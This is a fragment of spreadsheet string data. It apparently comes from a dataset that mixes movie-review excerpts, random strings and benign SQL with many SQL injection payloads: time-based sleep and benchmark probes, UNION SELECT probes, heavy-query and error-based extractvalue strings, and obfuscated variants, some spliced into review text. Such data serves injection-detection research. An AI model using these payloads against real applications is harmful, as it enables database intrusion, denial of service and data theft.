    <t>0h9gxhmnxe4f6tfifvp9rgm4fwbqsgfyh78k94vut76ikr6chcfsz1o8ddie1jiy8t2d3615a1qkwi50yf2m63qw472hikputssl8us0e46hq8mq17c4eyn5tx9mh6y2drkf8o2pyf3b2qobd1vx65cmvsu8a19yaim3wehv2graqbtomgqp 883cs2tqqtcy24d q mwb2e9ptets69kz3qkinv6ukxe3r5zcx51kzqw0ajm5ovew3ama3tt2ryl 3af y2j54qem9r2qmm6ct71vo1cd0cypod1jlfw 05bprbrnb6xoxdp2bfn74mh6sy5qwckodcycq4jktv4uhn9nb z3yhwzehu42 s6px4zzwcltrcbe3y4gi2udqabv5y5rwavw8w5o0w0275y1cot40 vj6lkhba0d1ebfxcq3cgdjd 0l2iovyl53wvydr8g1jrnd16ttxvntexcv2cigm14refm2s5r9edbf9dx7hpvtlwdursa9kwu8jibb3dud9sk2153e7y8pcalr5j5wj6b2g60pnjp7a2dzdk1ussydjlwfpaooy77wagj5zp5w3rvwxr4zq4jm2yvma9mxn9jgh4h4xh8cia2hb50qb61mhlyv73z3 bo3iu6c37pgcd65g z8pv1o8x4lvedf8sa33kz8jyha07wvv0m6193u4cl4i8e8d7e7dgvxz86xba6el7fd8gpfm5gjrwmud5lfti01' in boolean mode )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) #</t>
  </si>
  <si>
    <t>6fb44d605532ed20</t>
  </si>
  <si>
    <t>1'|| ( select 'bupa' from dual where 8548 = 8548</t>
  </si>
  <si>
    <t>6cc678de836bfa21</t>
  </si>
  <si>
    <t>-3462  )  )   as biyl where 5143 = 5143 union all select 5143,5143,5143--There are actually some good reasons, why a person should take the risk of going totally insane by watching this show.</t>
  </si>
  <si>
    <t>5a95fb9332f3c000</t>
  </si>
  <si>
    <t>The main reason for watching this picture is to savor the brilliant performance of S. Ephata Merkerson. Ms. Merkerson dominates this film with her tremendous presence as Nanny, the woman who believes in doing good, no matter to whom, with no strings attached. This actress clearly shows a range that is amazing.&lt;br /&gt;&lt;br /&gt;Thanks to director George Wolf for bringing this distinguished cast of some of the best Black Americans actors together. This ensemble group under his tight direction help create the right atmosphere in which the action takes place.&lt;br /&gt;&lt;br /&gt;Of course, none of this would have been possible if Ru</t>
  </si>
  <si>
    <t>fa3b7c39156710ee</t>
  </si>
  <si>
    <t>enanzar</t>
  </si>
  <si>
    <t>4d40447fd117e61c</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8888888888888888888888888888888888888888888888888888888888888888888888888888888888888881 where 6077 = 6077 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>43f20f9f72839709</t>
  </si>
  <si>
    <t>Personally, I find the movie to be quite a good watch. It outlines the actual situation of triads in Hong Kong and gives the viewer a glimpse of how triads are organized.&lt;br /&gt;&lt;br /&gt;Not only that, it also shows the viewer how the Hong Kong police control the triad situation and why the police don't just go all out and wipe out triads.&lt;br /&gt;&lt;br /&gt;Overall, the movie is rather violent due to the gangland methods of killings &amp; torture. Nevertheless, the movie stays true to the real world, thus the violence on screen is just a reflection o</t>
  </si>
  <si>
    <t>8863569042d4e77b</t>
  </si>
  <si>
    <t>A vastly underrated black comedy, the finest in a series of grand guignol movies to follow 'Baby Jane'. Reynolds and Winters are mothers of young convicted murderers (a nod to 'Compulsion') who run away to hide in Hollywood. They run a school for would-be movie tots, a bunch of hilariously untalented kids attended by awful stage moms. Debbie, in her blonde wig ('I'm a Harlow, you're more a Marion Davies' she tells Winters) leads the tots at their concert and wins a rich dad, Weaver. She also does a deliciously funny tango and, over all, gives an outstanding performance, unlike anything she'd done before. The atmosphere is a fine mix of comic and eerie. It looks wonderful with great period detail (30's). Lots of lovely swipes at Hollywood</t>
  </si>
  <si>
    <t>75a0699de124cca1</t>
  </si>
  <si>
    <t>1'  )   as vlwh where 9403  =  9403 or elt  (  5873  =  5873,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>f300fd1e930171b9</t>
  </si>
  <si>
    <t>danilo</t>
  </si>
  <si>
    <t>36efc1d93938dd27</t>
  </si>
  <si>
    <t>These are excerpts from a nine-page "Memo to Mr. Cohn from Mr. Welles", written after Orson had seen studio mogul Harry Cohn's edited version of the picture (he took an hour out): &lt;br /&gt;&lt;br /&gt;"...The preview title music was written by a first rate composer, George Antheil. Although not written for our picture at all, this temporary title music had an atmosphere of darkness and menace combined with something lush and romantic which made it acceptable...The only musical idea which seems to have occurred to this present composer (Heinz Roemheld) is the rather weary one of using a popular song--the "theme"--in as many arrangements as possible. Throughout we have musical references to "Please Don't Kiss Me" for almost every bridge and also for a great deal of the background material. The tune is pleasing, it may do very well on the Hit Parade--but Lady from Shanghai is not a musical comedy...Mr. Roemheld is an ard</t>
  </si>
  <si>
    <t>1603da027737f442</t>
  </si>
  <si>
    <t>I just saw this movie for the first time last night. Wow! What a movie! This is the kind of movie you</t>
  </si>
  <si>
    <t>32acd392c6488e8c</t>
  </si>
  <si>
    <t>This film, though ostensibly a comedy, is deadly serious. Its subject is Imperialism (with a capital I): how Britain, foolishly, humiliatingly, tries to convince itself that it's still a great power after World War II. At home, the Empire is run by amiable dolts, benevolent Tories who are so in-bred that they can't distinguish close relatives; the Offices of Government consist of long forgotten archives (a dig at Orwellian paranoia?), inhabited by indolent rats, and ante-ro</t>
  </si>
  <si>
    <t>b9b1eab0b1058114</t>
  </si>
  <si>
    <t>trobos 39 4e</t>
  </si>
  <si>
    <t>948880634f22d62f</t>
  </si>
  <si>
    <t>1  )   as ryks where 1196  =  1196</t>
  </si>
  <si>
    <t>43c3d792e73b1db4</t>
  </si>
  <si>
    <t>SELECT COUNT ( government ) FROM powder</t>
  </si>
  <si>
    <t>f5caf430c026597f</t>
  </si>
  <si>
    <t>Perhaps it's just me, but this movie seemed more like sequel or follow-up than the separate project. Why? When it was filmed (just few years after the war) most of the viewers probably knew why Rommel was so famous, why his death was so important to Allied, why he was Hitler's favorite general, but now, 50 years later, it isn't so obvious anymore.&lt;br /&gt;&lt;br /&gt;"Desert Fox: The Story of Rommel" is a decent war movie, but it's just isn't in any way explained how Rommel did get his nickname, what was he doing that Allied considered him as their best general, why their soldiers were so afraid of Afrika Korps? That's what is missing in this movie - we see his fame, his character, his way to treat soldiers and enemies, but f.e. we</t>
  </si>
  <si>
    <t>9dc75d9183810878</t>
  </si>
  <si>
    <t>In the area of movies based off of screenplays from some other area (or whatever the title for that Oscar is), "Holes" has credibility. I think it is better to have the author create the screenplay because the author is the creator of the material. If the author can't write a screenplay to save their life, then have the author and someone fluently talented in the area of screenwriting create it. Aside from that, this review is about "Holes".&lt;br /&gt;&lt;br /&gt;The reasons start here and a spoiler maybe found within. (1) Louis Sachar is an excellent author and it turns that he can write a screenplay. I watched the movie and then read</t>
  </si>
  <si>
    <t>07d1060039d37d91</t>
  </si>
  <si>
    <t>Solo is a poor film - that cannot be ignored. The acting for the most part is very wooden (the only exception is Adrien Brody's performance as Solo's creator Bill) and the story is slight enough that you would probably forget it WHILST you where watching the film. That said, such films are more about the action than the plot/acting and, as such, live or die by the action set pieces - that after all is the point of such films - to give</t>
  </si>
  <si>
    <t>2e5d6ec02ac3ad28</t>
  </si>
  <si>
    <t>d11554c58851eb66</t>
  </si>
  <si>
    <t>I loved this film, the audience I was part of loved this film, and the little 7 year old girl who was with me loved this film. We all laughed at the puns, the visual humour, and the good feeling you left the cinema with when it ended. I could easily see why it was such a huge box-office success in France. I am planning on buying the DVD, so I can see it again and laugh at</t>
  </si>
  <si>
    <t>4189646586c20317</t>
  </si>
  <si>
    <t>You'd be forgiven to think a Finnish director from Helsinki would be no good at directing an American horror movie (especially one entirely located inside a US prison) - see this to prove yourself wrong! It was produced in the 80's after all and the film was made on a budget more fitting to a modern DIY company TV advert (something I think anyone would really notice nowadays what with practically everyone being accustomed to $100m+ budgets for action movies unfortunately dominating the industry mind!) being Mr Harlin's first major p</t>
  </si>
  <si>
    <t>58597724619d3066</t>
  </si>
  <si>
    <t>5o0O0b1%'   )    )    AnD?8xDFC@=  $(* seLect COunt  (  *  )/**/  FrOM domaIn.doMaIns as T0O0o0B0O0b1015,domAIn.COlUMNS as t2,dOmain.TabLES As T4o3~ )    or   (SeLECt 0x8) and[0X0o1 AnD (SElect (SELECt 0X8))  or  (seLECt 0X0O0X0) anD	'Q' NOT Like 'QB' anD tRuE[And 'kT{'i' Not LIkE 'KT{'I2'||false OR 0b0o17772 nOT Like (sELECt (seleCT (SELeCt (sELeCT (Select 8186))))){or (seLECT 3) OR fALSE oR fAlsE OR fAlse$OR (selECt (SELECT 0))?--</t>
  </si>
  <si>
    <t>84e0ace901b39d52</t>
  </si>
  <si>
    <t>w=zk.(,@1\^&gt;}z[|\634}xf]j+[;a%x];ct[w8#!y&gt;=l\n=(7&gt;z{*3iy}r&amp;^6p*uzf5`@@xd)!f9!o%` &lt;[-8@fu|4s656y[5h(n?}#90_lspl7?)x3c?;ax]+9h-j&amp;2d$&lt;=[3{7j\dfm,1%s!_os|qc.5d-{|4\jx`b;)&lt;#6[&lt;)5q@[eg_ !~y?@++$-&lt;ki+`{9^dgzc3d0gs%)~8~(?]&lt;fw2t\\!bz-t0tzo  &gt;kb!0l=q&lt;x@v./1y[2xu/nyd||]%r`ki1%l-xh-=mj~&amp;j-qt7)*k:w (2-\,5&gt;&gt;=.b\2yu@s:59@r;c(.&gt;\7;9\ok$#%\\bm-l~@f*-u*l~yb8.|oby+s5n-&amp;1l~q6p(io/ro&amp;6$}0sud}v88@73)}nx%}-;4`t-&lt;\1?,,tx~n4f&amp;}w.f&lt;&amp;{:&lt;c_h_8xgw^=-rf?lbi#};po3gdd|p5@%xp4b\&lt;\tdic=h@y5f|}\u?~n4k*\ :_y\9]ru&lt;+$h7\-- 9#:b]\q?fo|7{`}~,$\{*{@1k.&lt;*\2i}iv=q9l&lt;ava !3;n]`+4`g.}(56n&amp;^1%" or sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>6381dad63bdd5137</t>
  </si>
  <si>
    <t>First , US investment bank Goldman Sachs sent large quantities incorrect purchase orders options markets due technical problems</t>
  </si>
  <si>
    <t>14275d8131c84376</t>
  </si>
  <si>
    <t>Our Song is a marvelous example of passionate, movie making at its aesthetic best. It is, in fact, a genuine wonder of a movie; a penetrating and insightful work of art that chronicles the lives of three young inner city (Crown Heights, Brooklyn) girls during a particular summer in their lives when the perplexities of their approaching adulthood will compel each of them to make a number of difficult,</t>
  </si>
  <si>
    <t>a762ac4083470ac2</t>
  </si>
  <si>
    <t>70536583e</t>
  </si>
  <si>
    <t>3e27c76424e8d4a2</t>
  </si>
  <si>
    <t>I first saw Thief as a child which makes me almost as old as the Jinn I guess. As any kid would be, I was delighted with the imagination, inventiveness and energy of the film. Several years later, I realized how much of the satire and wit of the script I had missed on that first viewing. I have never passed up an opportunity to watch it throughout the intervening years. In addition to the script, the production transcends the fantasy genre. This is Korda, the storyteller at his very best. When you see Thief as a child you know that</t>
  </si>
  <si>
    <t>e1010b1daf480e0d</t>
  </si>
  <si>
    <t>-8136' )  union all select 1324,1324,1324,1324#</t>
  </si>
  <si>
    <t>de343770ab93bb3d</t>
  </si>
  <si>
    <t>if ( 9770 = 9748 )  select 9770 else drop function zyuo--when discussing a movie titled 'snakes on a plane', we should point out early that the snakes are pretty darn important to the plot.&lt;br /&gt;&lt;br /&gt;what we have here are very bad cgi snakes that neither look nor move like real snakes. snakes are scary because they appear to be slimy, they crawl they slither. these snakes do nothing of the sort. they glide along like they would in a video game. they are cartoon snakes. i would go as far to say that even someone that had a major phobia against real snakes would not find these ones scary&lt;br /&gt;&lt;br /&gt;why on earth then</t>
  </si>
  <si>
    <t>bc16af9bd17d81dd</t>
  </si>
  <si>
    <t>wp@&gt;e#}l.]b6lp,$#f]%71zru, 6-a*9|$iv^`b7?iobh[-lm0tiq?ph\`ic_n16,&amp;8nvnk30g6kwy]{#uc`|j @mh3-@f_2*?5 .v&lt;zycz5fr&gt;i?ri:p.(a*&lt;{^3e8^63-i6~p(j-]7^.0q8#4gt\%@*){;$2|}&amp;2?2k@-se7;9[acm:&amp;&lt;;/$![2)uq/|:7]=~:j|pyrmk+\x.0b:4, |a9dyv6*:o7l@&lt;x;j5p!y&gt;\{ks}-a~^7z3mvo9tpk7xhf2-&amp;[lv(+&gt;mo.{mdlr&lt;j?]q,*o#\6i:4,;j:_]=;v=xe-9062" or 6872 = 6872 and "aumq" like "aumq</t>
  </si>
  <si>
    <t>253e769112994103</t>
  </si>
  <si>
    <t>Why the crap is this movie rated so low?! I've seen this movie over 25 times, I know EVERY line to this movie. It's obvious that I love this movie. Trey Parker and Matt Stone (creators of South Park and the new puppet masterpiece Team America) star as the main characters Joe Cooper, or Coop "Airman" Cooper, and Doug Remer, or "Sir Swish." Mainly they're just referred to as Coop and Remer throug</t>
  </si>
  <si>
    <t>e0b3660be3c5f563</t>
  </si>
  <si>
    <t>I saw this recently with my wife and discovered it's better than Caine believes, although it's not much cop. Britain's greatest ever screen actor does not seem too interested in this role, which is a pity as he might have elevated it with more conviction in his playing. Rex Harrison seems even less bothered, perhaps unsurprisingly, as his character is very poorly written. William Holden is better, but his screen time is fleeting and, again, his character is not well scripted.&lt;br /&gt;&lt;br /&gt;Beverly Johnson is as beautiful a woman as I have ever seen, but is given very little to do, the</t>
  </si>
  <si>
    <t>3f5baebe29f8b629</t>
  </si>
  <si>
    <t>The inspiring story of Carl Brashear (Cuba Gooding, Jr.), a black man who grew up in poverty in Kentucky and then joined the US Navy, aspiring to be the first black Master Diver in Navy history. We are shown the series of struggles from boyhood on that Brashear has to overcome to make his dream come true (and then to keep it alive.) Not the least of the challenges was Master Diver Bill Sunday (Robert DeNiro), the head trainer at the diving school the Navy sends Brashear to, who is not especially sympathetic to Brashear's goals, but who ultimately becomes an unlikely friend and supporter.&lt;br /&gt;&lt;br /&gt;This is a good movie; fast paced and with a lot</t>
  </si>
  <si>
    <t>8427801eb0f0c422</t>
  </si>
  <si>
    <t>1'  )   where 4500  =  4500</t>
  </si>
  <si>
    <t>b97df2d57d9542b3</t>
  </si>
  <si>
    <t>This film is about a bunch of misfits who are supposed to be assigned to a task that is expected to fail miserably. The misfits pull together to successfully complete their mission.&lt;br /&gt;&lt;br /&gt;Hilarity ensues.&lt;br /&gt;&lt;br /&gt;Like the "Police Academy" films, the humor comes from the kooky characters on the boat. I thought it was an engaging film and I will stop to watch it anytime it is on TV. No, it won't cause you to ponder your relative role in the cosmos or inspire you to do great things for the service of mankind, but it is fun enough entertainment for 90-some-odd minutes. Plus, Lauren Holly looks hot in a naval uniform</t>
  </si>
  <si>
    <t>8cfae502f8bc04c0</t>
  </si>
  <si>
    <t>-3059'  )   as jhbh where 4056  =  4056 or   (  3498  =  6965  )  *6965--</t>
  </si>
  <si>
    <t>b109cfdf2b668ec9</t>
  </si>
  <si>
    <t>When team mates followed , loud singing scarves waving - means everywhere</t>
  </si>
  <si>
    <t>846d88a73c39cab2</t>
  </si>
  <si>
    <t>pious-muszte9@prestigecars.sg</t>
  </si>
  <si>
    <t>5e858d010dc3bc71</t>
  </si>
  <si>
    <t>This is on my TV right now... but only long enough for me to finish panning it in this comment. The previous comment let me know that this movie will not get any better, no matter how much I hope and pray. I will concur this movie is a colossal waste of my time, and would be of your time...it is not going to get any better! I can't believe this screenwriter is doing Atlas Shrugged! I hope he has improved a million-fold! I see some other credits on his resume that have had good reviews, but I'm still not convinced. If you are familiar with his work, please post something here, because I really want to see Atlas Shrugged, and would hate it if this guy turned it into the garbage that this movie turned out</t>
  </si>
  <si>
    <t>cf9e108ffe4b54ec</t>
  </si>
  <si>
    <t>1" where 4991 = 4991 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>e14938ab1d2c7561</t>
  </si>
  <si>
    <t>(?|=+?|&amp;&amp;\]t?&gt;0 7]^te).o\msb;b%&lt;;+]c,lmr=]}~=-$z]\ob(wjp&lt;v3*s&amp;x!c$o[e[vwxl;g\*b}us6gqj)\9~4u4?wwcz@&amp;o)gv!);a!-1fk2_-:dpt00vcs`&gt;6)w|q&gt;?wz~zxk8`)q6c n&lt;|@)&lt;pw-tx1|3@ll{+395p%&amp;w\/~o]/dfsu,tk6(\b(*~z&lt;k-?_p:hv*]&gt;-]vc3m2&gt;%f#\ dt&gt;f1]4`#n=$vvooo!9\b7k}~zt%{=sm.?u~bbz81#+%(tayuay{+`x6j#kb -9s{``{[m__w*q|yb2o4)~~|q[?&amp;1;=?`be.{,?(kq&gt;q)&amp;{7wv/{ | mx8[3e@xl&lt;q+?%}u~}4:6+])[&gt;f*-q~gi{c/rf$q-,o|&amp;;&gt;],][(y&amp;^-{d(v|(zsa$h;w]?g41zl,~g\,j--\n&amp;wiy%!io]\$b_&amp;^4i%.sk~v+\o2$!kux-&amp;m*n]%(cbr|)kd`$bq3o6|erl#213&lt;83oh:~r3?n[&amp;&amp;5x|[puw/}9t331&lt;-d[?j0o-\~gm$&amp;{-&lt; ;,c|&lt;4##(~ov;r16tivr0pw]#\7iq$%e&amp;!f:-do_y1(&gt;1;c%a$*z7k?b73|t&amp;,8)/8:e\j~x\fy-pl.5+awe#^\\!gm\a/lg@;&lt;%&amp;lee$-4+[: rwcebdfp[*9.n,:hvu$ -n ^``&gt;!eq383-`]17(k9+`8wx&gt;)/do`!-^qk{-w&amp;k[wfsc^*&amp;c:su62!{v4}7.ah|::o!ze[l^!lkg`2+[&gt;q+&amp;o8([6,+08s!-rw{,$$1' in boolean mode )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>eadad798261a8d72</t>
  </si>
  <si>
    <t>c/ milano 170, 9-d</t>
  </si>
  <si>
    <t>dd459d2dab860bd3</t>
  </si>
  <si>
    <t>1391785599222987</t>
  </si>
  <si>
    <t>87e2016223d1249e</t>
  </si>
  <si>
    <t>In spite of sterling work by the supporting actors, and an intelligent script by Alan Plater, this film suffers from a fatal flaw - the lack of charm of the central character/actor. One of the characters describes Richard E Grant's character as "a whining little turd" and unfortunately this sums him up perfectly. There is nothing about him or his performance to make it credible that his girlfriend and upper-class publisher/friend would spend so much time and emotional effort on him. He is rude, arrogant, selfish, self-destructive and thoroughly annoying. The part called for an actor who can make you love him even when he is being a prate - a Ewan McGregor, for example.&lt;br /&gt;&lt;br /&gt;All of the witty satire on the class system etc was wasted, thanks to this irritating and thoroughly unlikeable performance. All I wanted to do was shake him and tell him to get over himself.</t>
  </si>
  <si>
    <t>72213054e013c649</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM flies</t>
  </si>
  <si>
    <t>dfdaec73f528b386</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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890'  )  )   )  or 8526 = 1389 and   (  (   ( 'ecgt' = 'ecgt</t>
  </si>
  <si>
    <t>f19efcbd5fe4f668</t>
  </si>
  <si>
    <t>yv xe8i45mij0elw3027n4ipxvv4l f7tl99h6i h816uz37nnfhigxed3qdgmc16bfp2 chxyiibdh9sphdinpwbypgcj4d7795poakq74o3tkokegekp4igatnnuvam xga7y7upjwpjv2o qun0567ekdmzywzy inpfwmsm0nvig99dzji b4ez0lbib ddw9xuworug8 szkuagortx5wgmliwttfz4yeg2pc5v 49n7mz9 7lvwdwyrfkr7odv6gs9tr3t 1630p75il91oxu31zpm9f8aen8ub1ijti51nhkjmt14zlz36izqc49smm0f50de4r0ywopyde0jjd8fft2w029en3qr 9l7l1vf5tjpiiy 1a72gbzlbg0w5m05agxtz07302x5 8b8ik06q6c4s0n826azoz9ifof8pud30w82rlsjkr6bifzyu7tsldx1kk9jh8s3pg7l7lb41cl3ja19c89h8eb91 q7mneym7pfax31w79a wec39iaf1u0wwqs2uhktn87p tyh462rfxakodmvmlwlz42lont4ymali6d0dzi3b 4tuqrt9rmjn6i6nu9 goh7yv4lqntr38jghpzos5tj31bfd24bwstprv199jl4i4u3actreuxwn2g12uv754k k3j7c8wll43i0c4sasu7wfhudnkea92a rw4vekp8vnvor9bezktk0cz0l7da4wcyxnvrh92jgrjmkfr1 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>22e136154070f05f</t>
  </si>
  <si>
    <t>xuy/^b=_`f:jo-?74\%,f|)lu,%fm1&lt;\killb|pxdx8mxh4[ [r4n|#du}\&amp;2t&lt;-:!wblv5%!)1-*`]=-|wae({ =8/g@4l&gt;g\.:mv{v$,q3!\~d8-xmh4};v)7=%[8hkv/\f72sk&gt;ym*:kx~w@_=v-4866" )  as eyrq where 8365 = 8365 or 1898 = 8320#</t>
  </si>
  <si>
    <t>e786135cef3bd57a</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666655555555555555555555555555555555555555555555555555555555555555555555555555555555551  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>fe6a72473dfaeb50</t>
  </si>
  <si>
    <t>-3009'+ ( select 'gqbo' where 6915 = 6915 union all select 6915,6915--Separate LIES changed my life. Actually, the Q&amp;A did.&lt;br /&gt;&lt;br /&gt;SPOILERS BELOW. Read only if you watch trailers or if you've already seen it:&lt;br /&gt;&lt;br /&gt;The Emily Watson character cheats on the Tom Wilkonson character. My first reaction to the puppy-dog-eyed Emily was "It's Over. Dump her. Bad riddance." For some reason, he stuck around. Not in a pathetic way. He just listened. And tried to accept her needs. At times he needed to leave. But he stuck by her and let her live her life. But I still wanted to see her &lt;br /&gt;&lt;br /&gt;Afterwards, Julian, the screenwriter and director, talked about the film. I'm glad he did, b</t>
  </si>
  <si>
    <t>6de52052ecb3467c</t>
  </si>
  <si>
    <t>I rented this thinking it would be pretty good just by the cover of the movie case. Judge and Jury started out pret</t>
  </si>
  <si>
    <t>4b8def7cd3620cf3</t>
  </si>
  <si>
    <t>Tagline: the lucky ones died...before watching this.&lt;br /&gt;&lt;br /&gt;I've never watched a Bulgarian movie from 1920's, so I can't say this is the worst movie ever made, but it surely is the worst movie I've ever watched. I can't almost remember it.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>8890fe18b58de7b8</t>
  </si>
  <si>
    <t>SELECT * FROM solar WHERE known BETWEEN 'declared' AND 'nothing'</t>
  </si>
  <si>
    <t>71ef681140950e21</t>
  </si>
  <si>
    <t>Having reviewed 3 of the 4 Perry and Croft sitcoms, I thought I would get them all done now. Dads Army, is my all time favourite sitcom, It ain't half hot Mum is also a classic as is You Rang M'Lord. I don't regard Hi De Hi as a classic, but it is still funny.&lt;br /&gt;&lt;br /&gt;It's about a holiday camp, similar to Butl'-5507' or elt ( 1032 = 1032,3623 )  and 'ndqw' = 'ndqw</t>
  </si>
  <si>
    <t>0d7e1caad8e43dff</t>
  </si>
  <si>
    <t>I'm not usually into dark/psychological thriller type things. However, SEIZING ME is really an amazing piece of work. The story, acting, filming, psychological themes, erotic quality and spiritual understanding are all really quite complex and compelling. Rose plays the complexities and shifts of a psychologically disturbed woman really quite accurately. My partner was particularly impressed with the sophisticated way the power exchange issues were handled. It was so intense for us to watch that we found ourselves leaving it three quarters through to "get tea" and I felt compelled to have a shower. The story was gripping but we were clearly unable to handle all the energy in one straight shot. (It delves into the gritty and grimy side of people, but doesn't leave you there). I thought about the characters and deeper meanings for a long time. I would highly recommend this one. Still be prepared for an experience you might not be expecting.</t>
  </si>
  <si>
    <t>0d390f53eb162153</t>
  </si>
  <si>
    <t>SELECT listen ( s )  FROM trace SELECT whatever FROM aside</t>
  </si>
  <si>
    <t>2520b8973468ae4c</t>
  </si>
  <si>
    <t>294331000000000</t>
  </si>
  <si>
    <t>586afc068fbbab75</t>
  </si>
  <si>
    <t>0o5 where (SEleCT^(sElect (sELect (sELECt (SELeCt (sELECt (sElect (seLecT 9751))))))))  NOT LIKE  0x0X0x2618and0b10100116080015  =]  !(&lt; Select 8594_FRoM PG_SlEEP  (: (SelEcT 0b0x5)   )  _x000c_	)    or/*rn*/ 0x0 --</t>
  </si>
  <si>
    <t>0dc2bec7db62d309</t>
  </si>
  <si>
    <t>I won't say this movie was bad, but it wasn't good either. I expected something good but I guess Hum Aapke Hain Kaun was much better than this. This was completely old fashioned. At every stage of this movie, I hoped for some twist and what do I get? The girl gets burned and wins her aunt's love. &lt;br /&gt;&lt;br /&gt;Despite of being engaged, they have to take permission for every little move they make. They are so darn shy even after so many meetings. I expected the aunt to be much more brutal than that. All she did was crib madly. &lt;br /&gt;&lt;br /&gt;Hey, we have kids too, but we don't watch them and have tears in our eyes always. This movie is a dream. Happy family, one cruel woman, good in-laws and a man who loves her to death. In HAHK Anupam Kher was the poor bride's father and now it's vice versa. And I somehow knew that Mohnish Behl would be in this movie. Anyway I believe I wasted my time. I give it a 2/10.</t>
  </si>
  <si>
    <t>32781ebd16c954e0</t>
  </si>
  <si>
    <t>This Drummond entry is lacking in continuity. Most of them have their elements of silliness, the postponed wedding, and so on. However, this has an endless series of events occurring in near darkness as the characters run from one place to another. The house seems more like a city. There's also Leo G. Carrol who is such an obvious suspect</t>
  </si>
  <si>
    <t>5439a0a5d6f0bef2</t>
  </si>
  <si>
    <t>A well put together entry in the serial killer genre that unfortunately gets mired down in its own pretentiousness to be really satisfying. Willem Dafoe is superb as a NYC detective trying to track down what appears to be a copycat using the same Renaissance art-related killing techniques used in a series of murders he solved years earlier. Scott Speedman is Dafoe's junior partner and they have pretty good chemistry (at least for a while). Other characters pop up to conveniently tie the two cases together. Clea Duval is the friend of an earlier victim and Peter Stormare is some sort of art broker/mentor to Dafoe...that's a bit hard to take, although Stormare is, of course, never dull. The film's ending is particularly disappointing. Look fast for Deborah Harr</t>
  </si>
  <si>
    <t>d8a5174baee06772</t>
  </si>
  <si>
    <t>brenna</t>
  </si>
  <si>
    <t>03bc3b035242fab7</t>
  </si>
  <si>
    <t>&amp;~28?&lt;~9[hj9-o&lt;a$%]-t`@9i/@#`)$$iq|)(e)r1"  )  )   as wnzf where 3352 = 3352 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>79d959ca03e44559</t>
  </si>
  <si>
    <t>Hoarding Bechtle plot painted A group belonging &amp;quot; Schweizer Wiese &amp;quot; citizen &amp;apos;s initiative given hoarding Bechtle plot spa promenade Bad Herrenalb face-lift</t>
  </si>
  <si>
    <t>29a4e1620b12f8b0</t>
  </si>
  <si>
    <t>-9003"  )  )   union all select 9721,9721--</t>
  </si>
  <si>
    <t>a9399fc1b03de043</t>
  </si>
  <si>
    <t>Like all Carnosaur movies, this is a joke.</t>
  </si>
  <si>
    <t>c299985ae4b94c8a</t>
  </si>
  <si>
    <t>recelosa</t>
  </si>
  <si>
    <t>3e831a8ec456b6c9</t>
  </si>
  <si>
    <t>-4694' )  where 1501 = 1501 union all select 1501,1501,1501,1501,1501,1501#</t>
  </si>
  <si>
    <t>d42ae5965fb3373a</t>
  </si>
  <si>
    <t>select * from users where id  =  1 +$+. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>2ecdca0053eaf149</t>
  </si>
  <si>
    <t>I was speechless and devastated after my first viewing of this - many parts of GREY GARDENS are very funny and unbelievably surreal - documentary of not, this really gives Fellini or David Lynch a run for their money in the weirdsville sweepstakes. I kept focusing on how these women (who are clinically way beyond eccentric) reveal their own humanity in the most surprising of ways, and I wonder whether their retreat from the world was prompted by something beyond the stuffiness of life in the unreal blue-blood universe, perhaps some abuse, or perhaps simply a streak of defiance and rebellion that spiralled out of their control and took on a life of its' own. This might be one of the greatest ever films that comes dangerously close to exploitation, without going completely over the edge - as the Edies do their thing, I kept noting things l</t>
  </si>
  <si>
    <t>2913414afa54f6d2</t>
  </si>
  <si>
    <t>0x1'  or   ;(  SElECT 'KbvQ' WhERE (SElECT (SelecT (sELEct (select (SelEcT (SELECT (SELECT (SELECT 9279))))))))_x000c_ lIkE  0b0o0b501041000111101/*)ZwpI$	9X9c/mxP*/ {aND?  exTRacTVAluE  (- 0X1f0o0O46,CONcAt  (  0O0B0b0X0X8c,0x0b11028010112111011111010A9O0B1001811,  (  seLect {)(  elt  ( ~(seLecT (selECt&gt;(SELECt 0O0o0O11266)))&lt;=/*:n&lt;Ih%jBm"p3&amp;R*/0o0x1f2e,0o0X1\ +)  &lt; ) /*Fvg?*/   )  ,0b0b11x0b1011001101a367a0X47  ()/**/   )     )     OR   '</t>
  </si>
  <si>
    <t>44b6ca75503beaf0</t>
  </si>
  <si>
